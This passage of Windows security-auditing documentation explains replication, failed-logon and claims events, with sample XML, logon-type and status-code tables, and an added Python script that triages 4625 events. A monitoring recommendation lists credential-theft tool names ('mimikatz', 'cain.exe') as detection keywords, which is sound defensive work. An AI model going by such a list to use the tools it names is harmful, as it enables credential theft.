    <Data Name="DestinationDRA">CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=contoso,DC=local</Data>
    <Data Name="SourceDRA">CN=NTDS Settings,CN=WIN2012R2,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=contoso,DC=local</Data>
    <Data Name="NamingContext">CN=Schema,CN=Configuration,DC=contoso,DC=local</Data>
    <Data Name="Options">2147483733</Data>
    <Data Name="SessionID">48</Data>
    <Data Name="StartUSN">20869</Data>
  </EventData>
</Event>

Required Server Roles: Active Directory domain controller.


Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Destination DRA [Type = UnicodeString]: destination directory replication agent distinguished name.

Note The Directory Replication Agent (DRA) handles replication between domain controllers. The
Directory Replication Agent uses the connection objects in the topology map to find out those partners that are
relevant when replicating changes to directory partitions. The DRA sends a replication request to the partners
of a domain controller when the domain controller needs to update its copy of Active Directory.

Source DRA [Type = UnicodeString]: source directory replication agent distinguished name.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of
relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN
attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

Naming Context [Type = UnicodeString]: naming context to replicate.


Note The Active Directory directory tree is partitioned to allow sections to be distributed (replicated)
to domain controllers in different domains within the forest. Each domain controller stores a copy of a specific
part of the directory tree, called a Naming Context, also known as a Directory Partition. A Naming Context is
replicated as a unit to other domain controllers in the forest that contain a replica of the same subtree.

Options [Type = UInt32]: decimal value of DRS Options.


Session ID [Type = UInt32]: unique identifier of replication session. Using this field you can find “4932:
Synchronization of a replica of an Active Directory naming context has begun.” and “4933: Synchronization
of a replica of an Active Directory naming context has ended.” events for the same session.
Start USN [Type = UnicodeString]: Naming Context’s USN number before replication begins.

Note Active Directory replication does not depend on time to determine what changes need to be
propagated. It relies instead on the use of update sequence numbers (USNs) that are assigned by a counter
that is local to each domain controller. Because these USN counters are local, it is easy to ensure that they are
reliable and never "run backward" (that is, decrease in value). The trade-off is that it is meaningless to compare
a USN assigned on one domain controller to a USN assigned on a different domain controller. The replication
system is designed with this restriction in mind.

Security Monitoring Recommendations


For 4932(S): Synchronization of a replica of an Active Directory naming context has begun.
Monitor for Source Address field, because the source of replication (DRA) must be authorized for this
action. If you find any unauthorized DRA you should trigger an event.
This event is typically used for Active Directory replication troubleshooting.
4933(S, F): Synchronization of a replica of an Active Directory naming context has ended.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016

Subcategory: Audit Directory Service Replication


Event Description:
This event generates every time synchronization of a replica of an Active Directory naming context has ended.
Failure event occurs when synchronization of a replica of an Active Directory naming context failed.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4933</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>14082</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8010000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-01T20:58:28.854735700Z" />
    <EventRecordID>413644</EventRecordID>
    <Correlation />
    <Execution ProcessID="524" ThreadID="2288" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="DestinationDRA">CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=contoso,DC=local</Data>
    <Data Name="SourceDRA">CN=NTDS Settings,CN=WIN2012R2,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=contoso,DC=local</Data>
    <Data Name="NamingContext">CN=Schema,CN=Configuration,DC=contoso,DC=local</Data>
    <Data Name="Options">2147483733</Data>
    <Data Name="SessionID">40</Data>
    <Data Name="EndUSN">20869</Data>
    <Data Name="StatusCode">1722</Data>
  </EventData>
</Event>

Required Server Roles: Active Directory domain controller.


Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Destination DRA [Type = UnicodeString]: destination directory replication agent distinguished name.

Note The Directory Replication Agent (DRA) handles replication between domain controllers. The
Directory Replication Agent uses the connection objects in the topology map to find out those partners that
are relevant when replicating changes to directory partitions. The DRA sends a replication request to the
partners of a domain controller when the domain controller needs to update its copy of Active Directory.

Source DRA [Type = UnicodeString]: source directory replication agent distinguished name.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of
relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN
attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

Naming Context [Type = UnicodeString]: naming context to replicate.


Note The Active Directory directory tree is partitioned to allow sections to be distributed (replicated)
to domain controllers in different domains within the forest. Each domain controller stores a copy of a specific
part of the directory tree, called a Naming Context, also known as a Directory Partition. A Naming Context is
replicated as a unit to other domain controllers in the forest that contain a replica of the same subtree.

Options [Type = UInt32]: decimal value of DRS Options.


Session ID [Type = UInt32]: unique identifier of replication session. Using this field you can find “4932:
Synchronization of a replica of an Active Directory naming context has begun.” and “4933: Synchronization
of a replica of an Active Directory naming context has ended.” events for the same session.
End USN [Type = UInt32]: Naming Context’s USN number after replication ends.

Note Active Directory replication does not depend on time to determine what changes need to be
propagated. It relies instead on the use of update sequence numbers (USNs) that are assigned by a counter
that is local to each domain controller. Because these USN counters are local, it is easy to ensure that they are
reliable and never "run backward" (that is, decrease in value). The trade-off is that it is meaningless to compare
a USN assigned on one domain controller to a USN assigned on a different domain controller. The replication
system is designed with this restriction in mind.

Status Code [Type = UInt32]: if there are no issues or errors, the status code will be “0”. If an error happened,
you will receive a Failure event and the Status Code will not be equal to “0”. You can check the error code
meaning here: https://msdn.microsoft.com/library/windows/desktop/ms681381(v=vs.85).aspx

Security Monitoring Recommendations

For 4933(S, F): Synchronization of a replica of an Active Directory naming context has ended.
Monitor for Source Address field, because the source of replication (DRA) must be authorized for this
action. If you find any unauthorized DRA you should trigger an event.
This event is typically used for Active Directory replication troubleshooting.
Audit Account Lockout
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Account Lockout enables you to audit security events that are generated by a failed attempt to log on to an
account that is locked out.
If you configure this policy setting, an audit event is generated when an account cannot log on to a computer
because the account is locked out.
Account lockout events are essential for understanding user activity and detecting potential attacks.
Event volume: Low.
This subcategory audits failed logon attempts made when the account was already locked out.

Computer type       General Success   General Failure   Stronger Success   Stronger Failure
Domain Controller   No                Yes               No                 Yes
Member Server       No                Yes               No                 Yes
Workstation         No                Yes               No                 Yes

Comments (all computer types): We recommend tracking account lockouts, especially for high value domain or
local accounts (database administrators, built-in local administrator account, domain administrators, service
accounts, domain controller accounts, and so on). This subcategory doesn’t have Success events, so there is no
recommendation to enable Success auditing for this subcategory.

Events List:
4625(F): An account failed to log on.
4625(F): An account failed to log on.
4/5/2019 • 13 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit Account Lockout and Audit Logon
Event Description:
This event generates if an account logon attempt failed when the account was already locked out. It also
generates for a logon attempt after which the account was locked out.
It generates on the computer where the logon attempt was made; for example, if the logon attempt was made on
the user’s workstation, then the event will be logged on this workstation.
This event generates on domain controllers, member servers, and workstations.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4625</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12546</Task>
<Opcode>0</Opcode>
<Keywords>0x8010000000000000</Keywords>
<TimeCreated SystemTime="2015-09-08T22:54:54.962511700Z" />
<EventRecordID>229977</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="3240" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">DC01$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="TargetUserSid">S-1-0-0</Data>
<Data Name="TargetUserName">Auditor</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="Status">0xc0000234</Data>
<Data Name="FailureReason">%%2307</Data>
<Data Name="SubStatus">0x0</Data>
<Data Name="LogonType">2</Data>
<Data Name="LogonProcessName">User32</Data>
<Data Name="AuthenticationPackageName">Negotiate</Data>
<Data Name="WorkstationName">DC01</Data>
<Data Name="TransmittedServices">-</Data>
<Data Name="LmPackageName">-</Data>
<Data Name="KeyLength">0</Data>
<Data Name="ProcessId">0x1bc</Data>
<Data Name="ProcessName">C:\\Windows\\System32\\winlogon.exe</Data>
<Data Name="IpAddress">127.0.0.1</Data>
<Data Name="IpPort">0</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that reported information about logon failure. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique
identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.
Account Name [Type = UnicodeString]: the name of the account that reported information about logon
failure.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon Type [Type = UInt32]: the type of logon which was performed. “Table 11. Windows Logon Types” contains
the list of possible values for this field.

Logon type  Logon title        Description
2           Interactive        A user logged on to this computer.
3           Network            A user or computer logged on to this computer from the network.
4           Batch              Batch logon type is used by batch servers, where processes may be executing on
                               behalf of a user without their direct intervention.
5           Service            A service was started by the Service Control Manager.
7           Unlock             This workstation was unlocked.
8           NetworkCleartext   A user logged on to this computer from the network. The user's password was
                               passed to the authentication package in its unhashed form. The built-in
                               authentication packages all hash credentials before sending them across the
                               network. The credentials do not traverse the network in plaintext (also called
                               cleartext).
9           NewCredentials     A caller cloned its current token and specified new credentials for outbound
                               connections. The new logon session has the same local identity, but uses
                               different credentials for other network connections.
10          RemoteInteractive  A user logged on to this computer remotely using Terminal Services or Remote
                               Desktop.
11          CachedInteractive  A user logged on to this computer with network credentials that were stored
                               locally on the computer. The domain controller was not contacted to verify the
                               credentials.

Table: Windows Logon Types

Account For Which Logon Failed:
Security ID [Type = SID]: SID of the account that was specified in the logon attempt. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique
identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that was specified in the logon attempt.
Account Domain [Type = UnicodeString]: domain or computer name. Formats vary, and include the
following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Failure Information:
Failure Reason [Type = UnicodeString]: textual explanation of Status field value. For this event it typically
has “Account locked out” value.
Status [Type = HexInt32]: the reason why logon failed. For this event it typically has “0xC0000234” value.
The most common status codes are listed in “Table 12. Windows logon status codes.”

Status\Sub-Status code   Description
0xC000005E               There are currently no logon servers available to service the logon request.
0xC0000064               User logon with misspelled or bad user account
0xC000006A               User logon with misspelled or bad password
0xC000006D               This is either due to a bad username or authentication information
0xC000006E               Unknown user name or bad password.
0xC000006F               User logon outside authorized hours
0xC0000070               User logon from unauthorized workstation
0xC0000071               User logon with expired password
0xC0000072               User logon to account disabled by administrator
0xC00000DC               Indicates the Sam Server was in the wrong state to perform the desired operation.
0xC0000133               Clocks between DC and other computer too far out of sync
0xC000015B               The user has not been granted the requested logon type (aka logon right) at this
                         machine
0xC000018C               The logon request failed because the trust relationship between the primary domain
                         and the trusted domain failed.
0xC0000192               An attempt was made to logon, but the Netlogon service was not started.
0xC0000193               User logon with expired account
0xC0000224               User is required to change password at next logon
0xC0000225               Evidently a bug in Windows and not a risk
0xC0000234               User logon with account locked
0xC00002EE               Failure Reason: An Error occurred during Logon
0xC0000413               Logon Failure: The machine you are logging onto is protected by an authentication
                         firewall. The specified account is not allowed to authenticate to the machine.
0x0                      Status OK.

Table: Windows logon status codes.


Note To see the meaning of other status\sub-status codes you may also check for the status code in the Windows
header file ntstatus.h in the Windows SDK.
More information: https://dev.windows.com/en-us/downloads
Sub Status [Type = HexInt32]: additional information about logon failure. The most common sub-status codes
are listed in “Table 12. Windows logon status codes.”
Process Information:
Caller Process ID [Type = Pointer]: hexadecimal Process ID of the process that attempted the logon.
Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the
PID for a specific process you can, for example, use Task Manager (Details tab, PID column):

If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Caller Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Network Information:
Workstation Name [Type = UnicodeString]: machine name from which logon attempt was performed.
Source Network Address [Type = UnicodeString]: IP address of machine from which logon attempt was
performed.
IPv6 address or ::ffff:IPv4 address of a client.
::1 or 127.0.0.1 means localhost.
Source Port [Type = UnicodeString]: source port which was used for logon attempt from remote machine.
0 for interactive logons.
Detailed Authentication Information:
Logon Process [Type = UnicodeString]: the name of the trusted logon process that was used for the logon
attempt. See event “4611: A trusted logon process has been registered with the Local Security Authority”
description for more information.
Authentication Package [Type = UnicodeString]: The name of the authentication package which was used
for the logon authentication process. Default packages loaded on LSA startup are located in
“HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig” registry key. Other packages can be loaded at
runtime. When a new package is loaded a “4610: An authentication package has been loaded by the Local
Security Authority” (typically for NTLM ) or “4622: A security package has been loaded by the Local Security
Authority” (typically for Kerberos) event is logged to indicate that a new package has been loaded along with
the package name. The most common authentication packages are:
NTLM – NTLM-family authentication.
Kerberos – Kerberos authentication.
Negotiate – the Negotiate security package selects between Kerberos and NTLM protocols.
Negotiate selects Kerberos unless it cannot be used by one of the systems involved in the
authentication or the calling application did not provide sufficient information to use Kerberos.
Transited Services [Type = UnicodeString] [Kerberos-only]: the list of transited services. Transited
services are populated if the logon was a result of a S4U (Service For User) logon process. S4U is a
Microsoft extension to the Kerberos Protocol to allow an application service to obtain a Kerberos service
ticket on behalf of a user – most commonly done by a front-end website to access an internal resource on
behalf of a user. For more information about S4U, see https://msdn.microsoft.com/library/cc246072.aspx
Package Name (NTLM only) [Type = UnicodeString]: The name of the LAN Manager sub-package
(NTLM-family protocol name) that was used during the logon attempt. Possible values are:
“NTLM V1”
“NTLM V2”
“LM”
Only populated if “Authentication Package” = “NTLM”.
Key Length [Type = UInt32]: the length of NTLM Session Security key. Typically it has 128 bit or 56 bit
length. This parameter is always 0 if “Authentication Package” = “Kerberos”, because it is not applicable
for Kerberos protocol. This field will also have “0” value if Kerberos was negotiated using Negotiate
authentication package.

Security Monitoring Recommendations

For 4625(F): An account failed to log on.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with
“Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz” or
“cain.exe”), check for these substrings in “Process Name.”
If Subject\Account Name is the name of a service account or user account, it may be useful to investigate
whether that account is allowed (or expected) to request logon for Account For Which Logon
Failed\Security ID.
To monitor for a mismatch between the logon type and the account that uses it (for example, if Logon Type
4-Batch or 5-Service is used by a member of a domain administrative group), monitor Logon Type in this
event.
If you have a high-value domain or local account for which you need to monitor every lockout, monitor all
4625 events with the “Subject\Security ID” that corresponds to the account.
We recommend monitoring all 4625 events for local accounts, because these accounts typically should not
be locked out. This is especially relevant for critical servers, administrative workstations, and other high value
assets.
We recommend monitoring all 4625 events for service accounts, because these accounts should not be
locked out or prevented from functioning. This is especially relevant for critical servers, administrative
workstations, and other high value assets.
If your organization restricts logons in the following ways, you can use this event to monitor accordingly:
If the “Account For Which Logon Failed \Security ID” should never be used to log on from the
specific Network Information\Workstation Name.
If a specific account, such as a service account, should only be used from your internal IP address list
(or some other list of IP addresses). In this case, you can monitor for Network Information\Source
Network Address and compare the network address with your list of IP addresses.
If a particular version of NTLM is always used in your organization. In this case, you can use this
event to monitor Package Name (NTLM only), for example, to find events where Package Name
(NTLM only) does not equal NTLM V2.
If NTLM is not used in your organization, or should not be used by a specific account (New
Logon\Security ID). In this case, monitor for all events where Authentication Package is NTLM.
If the Authentication Package is NTLM. In this case, monitor for Key Length not equal to 128,
because all Windows operating systems starting with Windows 2000 support 128-bit Key Length.
If Logon Process is not from a trusted logon processes list.
Monitor for all events with the fields and values in the following table:

Field: Failure Information\Status or Failure Information\Sub Status. Values to monitor for:
0xC000005E – “There are currently no logon servers available to service the logon request.” This is typically
not a security issue but it can be an infrastructure or availability issue.
0xC0000064 – “User logon with misspelled or bad user account”. Especially if you get a number of these in a
row, it can be a sign of user enumeration attack.
0xC000006A – “User logon with misspelled or bad password” for critical accounts or service accounts.
Especially watch for a number of such events in a row.
0xC000006D – “This is either due to a bad username or authentication information” for critical accounts or
service accounts. Especially watch for a number of such events in a row.
0xC000006F – “User logon outside authorized hours”.
0xC0000070 – “User logon from unauthorized workstation”.
0xC0000072 – “User logon to account disabled by administrator”.
0xC000015B – “The user has not been granted the requested logon type (aka logon right) at this machine”.
0xC0000192 – “An attempt was made to logon, but the Netlogon service was not started”. This is typically not
a security issue but it can be an infrastructure or availability issue.
0xC0000193 – “User logon with expired account”.
0xC0000413 – “Logon Failure: The machine you are logging onto is protected by an authentication firewall.
The specified account is not allowed to authenticate to the machine”.
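The recommendations above, applied to a 4625 event as a short triage script. This is an added example, not Microsoft's code: it reads the EventData fields from the event XML, flags the watched Status/Sub Status values, the NTLM checks (package not NTLM V2, key length not 128), Batch/Service logons and lockouts of watched accounts. Sample 1 is the event shown on this page; sample 2 and the watched-account list are constructed assumptions.

```python
"""Triage Windows Security event 4625 against the monitoring recommendations above.

Added example, not Microsoft's code. It reads the EventData fields of a 4625
event and flags what the recommendations describe: a Status or Sub Status value
from the watch table, an NTLM logon not using NTLM V2 or a 128-bit key, a Batch
(4) or Service (5) logon by a watched account, and a lockout (0xC0000234) of a
watched account. Sample 1 is the event shown on this page; sample 2 is
constructed. The watched-account list is an assumption, not from the page.
"""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Status / sub-status values from the "Monitor for all events with the fields
# and values in the following table" list, tagged with the page's note on
# which ones point to an infrastructure problem rather than a security one.
WATCHED_STATUS = {
    0xC000005E: ("no logon servers available", "infrastructure"),
    0xC0000064: ("bad user account; a run of these can be user enumeration", "security"),
    0xC000006A: ("bad password", "security"),
    0xC000006D: ("bad username or authentication information", "security"),
    0xC000006F: ("logon outside authorized hours", "security"),
    0xC0000070: ("logon from unauthorized workstation", "security"),
    0xC0000072: ("account disabled by administrator", "security"),
    0xC000015B: ("logon type not granted at this machine", "security"),
    0xC0000192: ("Netlogon service not started", "infrastructure"),
    0xC0000193: ("expired account", "security"),
    0xC0000413: ("blocked by an authentication firewall", "security"),
}
LOCKED_OUT = 0xC0000234

# Assumed watch list: high-value and service accounts whose lockouts and
# Batch/Service logons should be investigated (see the recommendations).
WATCHED_ACCOUNTS = {"Auditor", "dadmin", "sqlsvc"}


def parse_event_data(xml_text):
    """Return the <Data Name=...> fields of the event's EventData as a dict."""
    root = ET.fromstring(xml_text)
    return {d.get("Name"): (d.text or "") for d in root.findall(".//e:EventData/e:Data", NS)}


def triage_4625(xml_text):
    """Apply the 4625 monitoring recommendations to one event; return findings."""
    data = parse_event_data(xml_text)
    findings = []
    status = int(data.get("Status", "0x0"), 16)
    sub_status = int(data.get("SubStatus", "0x0"), 16)
    target = data.get("TargetUserName", "")
    for code in (status, sub_status):          # either field may carry the code
        if code in WATCHED_STATUS:
            desc, kind = WATCHED_STATUS[code]
            findings.append(f"{kind}: 0x{code:08X} {desc}")
    if status == LOCKED_OUT and target in WATCHED_ACCOUNTS:
        findings.append(f"security: watched account {target} is locked out")
    if data.get("AuthenticationPackageName") == "NTLM":
        if data.get("LmPackageName") != "NTLM V2":
            findings.append(f"security: NTLM package {data.get('LmPackageName')} is not NTLM V2")
        if data.get("KeyLength") != "128":
            findings.append(f"security: NTLM key length {data.get('KeyLength')} is not 128")
    if data.get("LogonType") in ("4", "5") and target in WATCHED_ACCOUNTS:
        findings.append(f"security: watched account {target} used logon type {data['LogonType']}")
    return findings


# Sample 1: the 4625 event from this page (lockout of "Auditor", Negotiate, logon type 2).
PAGE_EVENT = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4625</EventID><Computer>DC01.contoso.local</Computer></System>
<EventData>
<Data Name="TargetUserName">Auditor</Data>
<Data Name="Status">0xc0000234</Data>
<Data Name="SubStatus">0x0</Data>
<Data Name="LogonType">2</Data>
<Data Name="AuthenticationPackageName">Negotiate</Data>
</EventData></Event>"""

# Sample 2 (constructed): a service account failing with a bad password over NTLM V1 and a 56-bit key.
CONSTRUCTED_EVENT = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4625</EventID><Computer>SRV01.contoso.local</Computer></System>
<EventData>
<Data Name="TargetUserName">sqlsvc</Data>
<Data Name="Status">0xc000006d</Data>
<Data Name="SubStatus">0xc000006a</Data>
<Data Name="LogonType">5</Data>
<Data Name="AuthenticationPackageName">NTLM</Data>
<Data Name="LmPackageName">NTLM V1</Data>
<Data Name="KeyLength">56</Data>
</EventData></Event>"""

if __name__ == "__main__":
    for event in (PAGE_EVENT, CONSTRUCTED_EVENT):
        print(triage_4625(event))
```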
Audit User/Device Claims
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit User/Device Claims allows you to audit user and device claims information in the account’s logon token.
Events in this subcategory are generated on the computer on which a logon session is created. For an interactive
logon, the security audit event is generated on the computer that the user logged on to.
For a network logon, such as accessing a shared folder on the network, the security audit event is generated on the
computer hosting the resource.
Important: Audit Logon subcategory must also be enabled in order to get events from this subcategory.
Event volume:
Low on a client computer.
Medium on a domain controller or network servers.

Computer type       General Success   General Failure   Stronger Success   Stronger Failure
Domain Controller   IF                No                IF                 No
Member Server       IF                No                IF                 No
Workstation         IF                No                IF                 No

Comments (all computer types): IF – if claims are in use in your organization and you need to monitor
user/device claims, enable Success auditing for this subcategory. This subcategory doesn’t have Failure events,
so there is no recommendation to enable Failure auditing for this subcategory.

Events List:
4626(S): User/Device claims information.
4626(S): User/Device claims information.
4/5/2019 • 6 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit User/Device Claims
Event Description:
This event generates for new account logons and contains user/device claims which were associated with a new
logon session.
This event does not generate if the user/device doesn’t have claims.
For computer account logons you will also see device claims listed in the “User Claims” field.
You will typically get “4624: An account was successfully logged on” and after it a 4626 event with the same
information in Subject, Logon Type and New Logon sections.
This event generates on the computer to which the logon was performed (target computer). For example, for
Interactive logons it will be the same computer.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4626</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12553</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-10T00:12:02.243396300Z" />
<EventRecordID>232648</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="1092" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-0-0</Data>
<Data Name="SubjectUserName">-</Data>
<Data Name="SubjectDomainName">-</Data>
<Data Name="SubjectLogonId">0x0</Data>
<Data Name="TargetUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="TargetUserName">dadmin</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetLogonId">0x136f7b</Data>
<Data Name="LogonType">3</Data>
<Data Name="EventIdx">1</Data>
<Data Name="EventCountTotal">1</Data>
<Data Name="UserClaims">ad://ext/cn:88d2b96fdb2b4c49 <%%1818> : "dadmin" ad://ext/Department:88d16a8edaa8c66b
<%%1818> : "IT"</Data>
<Data Name="DeviceClaims">-</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2012, Windows 8.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that reported information about claims. Event Viewer automatically
tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in
the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that reported information about claims.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Logon Type [Type = UInt32]: the type of logon which was performed. The table below contains the list of possible
values for this field:

Logon type  Logon title        Description
2           Interactive        A user logged on to this computer.
3           Network            A user or computer logged on to this computer from the network.
4           Batch              Batch logon type is used by batch servers, where processes may be executing on
                               behalf of a user without their direct intervention.
5           Service            A service was started by the Service Control Manager.
7           Unlock             This workstation was unlocked.
8           NetworkCleartext   A user logged on to this computer from the network. The user's password was
                               passed to the authentication package in its unhashed form. The built-in
                               authentication packages all hash credentials before sending them across the
                               network. The credentials do not traverse the network in plaintext (also called
                               cleartext).
9           NewCredentials     A caller cloned its current token and specified new credentials for outbound
                               connections. The new logon session has the same local identity, but uses
                               different credentials for other network connections.
10          RemoteInteractive  A user logged on to this computer remotely using Terminal Services or Remote
                               Desktop.
11          CachedInteractive  A user logged on to this computer with network credentials that were stored
                               locally on the computer. The domain controller was not contacted to verify the
                               credentials.

New Logon:
Security ID [Type = SID]: SID of account for which logon was performed. Event Viewer automatically tries to
resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the
event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account for which logon was performed.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Event in sequence [Type = UInt32]: If there is not enough space in one event to put all claims, you will see “1
of N” in this field and additional events will be generated. Typically this field has “1 of 1” value.
User Claims [Type = UnicodeString]: list of user claims for new logon session. This field contains user claims if
a user account was logged in and device claims if a computer account was logged in. Here is an example of how to
parse an entry in this field:
ad://ext/cn:88d2b96fdb2b4c49 <String> : “dadmin”
cn – claim display name.
88d2b96fdb2b4c49 – unique claim ID.
<String> – claim type.
“dadmin” – claim value.
Device Claims [Type = UnicodeString]: list of device claims for new logon session. For user accounts this field
